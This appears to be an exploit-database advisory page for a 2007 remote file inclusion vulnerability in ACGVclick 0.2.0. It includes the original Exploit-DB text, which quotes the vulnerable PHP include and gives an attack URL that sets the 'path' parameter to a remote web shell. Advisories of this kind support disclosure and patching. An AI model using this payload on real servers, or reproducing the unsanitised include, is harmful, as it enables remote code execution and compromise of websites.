ACGVclick - exploit.company

vendor:

ACGVclick

by:

ajann

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: ACGVclick

Affected Version From: 0.2.0

Affected Version To: 0.2.0

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

ACGVclick <= 0.2.0 (path) Remote File Include Vulnerability

The ACGVclick version 0.2.0 is vulnerable to a remote file inclusion vulnerability. This vulnerability allows an attacker to include arbitrary files from a remote server by manipulating the 'path' parameter in the 'function.inc.php' file. By exploiting this vulnerability, an attacker can execute malicious code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of ACGVclick that addresses this issue. Alternatively, ensure that user input is properly validated and sanitized before including files.

Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  ACGVclick <= 0.2.0 (path) Remote File Include Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://acgv.free.fr
# $$      :  Free

*******************************************************************************
[[ERROR]]]
..
...
.....
<?
include($path."mysql.php");
include($path."aclick_connect.php");
$raf= new mysql_connection($hote,$login,$pass,$base);
?>
..
...
.....

[[ERROR]]]


[[RFI]]]

http://[target]/[path]//function.inc.php?path=[SHELL]

Example:

//function.inc.php?path=http://[target]/[path]/shell.x

[[/RFI]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-27]